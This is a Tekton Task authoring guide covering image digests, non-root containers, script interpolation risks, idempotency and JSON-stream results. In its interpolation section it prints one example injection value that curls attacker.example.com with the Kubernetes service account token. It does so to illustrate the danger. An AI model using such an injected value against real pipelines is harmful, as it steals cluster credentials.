This is a collection of recommendations for developers authoring Tasks, with justifications for why they are recommended.
These are just recommendations, and there may be situations where the recommendation cannot or should not be followed.
This is a living document. Recommendations may be added in the future, or existing recommendations may change or be clarified.
If you have a question or would like to add a recommendation, please file an issue.
Where possible, an image used in a step should be referenced by digest (i.e.,
busybox@sha256:abcde...
) instead of by tag (busybox:latest
). This ties the
Task to the exact specific version of the image, and prevents unexpected
changes.
Referencing by tag (:latest
or :v1.2.3
) means that an owner of that image
can push a new image to that tag, and all Tasks that reference the image by
that tag will start using it immediately. This can lead to unexpected Task
failures, or silent behavior changes, including security-sensitive changes.
One of the security best practices of containers is to run them as a
non-root user. Usually this is achieved by having a user defined in
your image and having it referred in your image configuration. You can
see
here
for details on best practice with Dockerfile
s.
You should also avoid as much as possible to run containers as privileged.
The --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do. This flag exists to allow special use-cases, like running Docker within Docker.
On the catalog, this means that you should, where possible:
-
ensure the image you are using can run as non-root ; any step that do not specify explicitly that it needs to be run as root should work when running as a user.
-
if your step really need to be run as root, specify it in the task using
securityContext
, same applies forprivileged
.# […] steps: - name: foo image: myimage securityContext: runAsUser: 0 # root uid == 0 privileged: true
Make use of recent Kubernetes and Tekton features only when a user
will expect it from the task's purpose. Your task may be of great use
to users that have good reason not to upgrade right now. Your task
should include the tekton.dev/pipelines.minVersion
.
Yes, sh and bash are DSLs for running processes, but sometimes there are other languages more suited for what you're trying to do. Tekton Pipelines' main positive attribute is the ability to have the right tool available for every step, including the interpreter. Use python or another scripting languages when that is warranted.
A python example:
steps:
- name: foo
image: python:alpine
script: |
#!/bin/env python
import os
print(os.getenv('PARAM_ONE'))
Using $(tekton.task)
interpolation in the script
or as a sh -c
string is extremely fragile. The interpolation done by tekton is not
aware of the context in which the interpolation happens. A space, a
quote sign, a backslash or newline could easily thwart an otherwise
beautiful script.
steps:
- name: foo
image: myimage
script: |
echo $(params.one)
If params.one
happens to contain a quote, then the resulting shell
script might look like this:
echo '
This script is not valid, and the task will fail:
sh: 1: Syntax error: Unterminated quoted string
This goes for standard shell scripts, python scripts or any other script where tekton ends up interpolating variables. Different languages have different quoting rules in different contexts, but a maliciously formed parameter would be able to break out of any quoting.
No amount of escaping will be air-tight. Even python """
strings.
A maliciously formed parameter just needs to include another """
to
close the string:
script: |
#!/bin/env python
value = """$(params.one)"""
print(value)
If the parameter has the value """
followed by a line break, then
the anything after the parameter's newline will be interpreted as
python code, probably causing the script to fail, or worse.
Instead, use environment variables or arguments, which are not interpolated into the script source code:
steps:
- name: foo
image: myimage
env:
- name: PARAM_ONE
value: $(params.one)
args:
- $(params.one)
script: |
echo "$PARAM_ONE"
echo "$1"
The script will now correctly print out the value of params.one, regardless of what it contains; both environment variables and arguments.
It is worth mentioning that an interpolated script (i.e. one that has
$(params.values)
in it) is a security problem. If an attacker is
able to send in a parameter value that looks something like $(curl -s http://attacker.example.com/?value=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token))
, then the
attacker would be able to exfiltrate the service account token for the
TaskRun.
As a task grows in complexity, it becomes harder and harder to maintain it in-line. Because you have already avoided interpolation in the script, there is no real need for the script to be in-lined into the Task.
As with all configuration and code that you write as part of software development, it is important to treat the Tasks and embedded scripts with the same care you use for your other code.
Scripts should be maintained such that they can be versioned and tested; therefore as a script grows beyond a few simple lines, you should store the script in version control, and use tests and code review to maintain it over time. At this point you may want to consider switching from a language which does not naturally support tasking, such as bash, to one that does, such as Python.
At this point, the best option we have to offer is to build and publish an image which contains your tested, versioned script, and use that image from within your Task. This may seem like a big ask, but another way of looking at it is that your script has graduated from just being a script to being a tool.
Use sound engineering principles when building Tekton Task code. Since the code can reside in external files, it's possible to split them up and have test harnesses that test various code paths. Have a build system that runs the task's test harness whenever you make changes to them before you commit, and of course a Tekton Pipeline to verify that your tests are passing before merging.
When you design tasks and pipelines, they should, as much as possible be written in an idempotent manner. Idempotency means that it is safe to re-execute, and this can be used to your advantage. If designed properly, it can also allow you to skip work that has already happened (see level-based approach).
Specify the format when defining parameters and results, even down to trailing whitespace. Specify the intention behind them. For parameters, indicate if there are other tasks that might have an output that matches. For a result, indicate where you might use the result.
This is especially important when building tasks that may be composed in different ways, and where the results of some tasks are intended to be the parameters to other tasks.
Especially when passing lists of items between tasks (i.e. a list of items from one task, designed to be the parameter of another task), avoid using structured strings, tab-separated values, or even line-separated values. Such formats are prone to error due to simple whitespace mistakes, or a rogue value that contains a hard-to-detect newline.
Instead use a more structured data format like e.g. a json stream or more formally JSON Text Sequences RFC 7464, and use jq to process the different records that are passed in to a task. This ensures you can pass almost any conceivable type of data without any escaping issues.
# task foo
steps:
- name: foo
image: myimage
script: |
echo '{"value": 123}' >> $(results.data.path)
# task other
steps:
- name: bar
image: myimage
script: |
printf '{"size": "large"}' >> $(results.data.path)
printf '{"size": "small", "fake": true}' >> $(results.data.path)
# pipeline
- name: example
taskRef:
kind: Task
name: pipeline
params:
- name: data
value: |
$(tasks.foo.results.data)
$(tasks.bar.results.data)
Here, the "foo" and "bar" task results and the "data" parameter of the pipeline have been defined to be of type JSON Stream, allowing the pipeline author to construct the pipeline parameter value directly by concatenating the results. This construct does not fall apart when the data is on one line or split on multiple lines.
If you have a task that creates another pipelinerun in order to
complete its work, you should leverage the fact that kubectl apply
has "create-or-update" semantics. If you apply a pipelinerun that
already exists, it means that you don't need to rerun the pipeline.
For example, if you have a task that takes a commit as a parameter,
say abc123def
, and its job is to create a pipelinerun with that
commit as a parameter (and the other pipeline is idempotent, and does
not need to be re-run for the same commit), then you could apply the
pipelinerun run-abc123def
. The first time, run-abc123def
won't
exist, and a PipelineRun will be created, running the pipeline. If,
at a later point in time, the task happens to be run with the same
commit, it will again apply the pipelinerun run-abc123def
. Since
it already exists, nothing happens.
This technique can be used to "short circuit" work when it is not necessary to re-run.
tekton.dev/platforms
annotation indicates on which platforms (for
instance, "linux/amd64,linux/arm64" or "windows/amd64") resource can
be run.
The most reliable option to verify the platform list is to run the
e2e tests provided with the resource. Minimal requirement is to use
the container image, which has support for corresponding platform.
Add Platforms
section into the README.md of the corresponding resource.
If running of the resource on specific platform requires to use another
image or do other customization, it should be also mentioned in the section.
If you don't know, which platforms to specify, good start is to use "linux/amd64", as it is most popular platform and most likely the tests, you've done, were on top of it.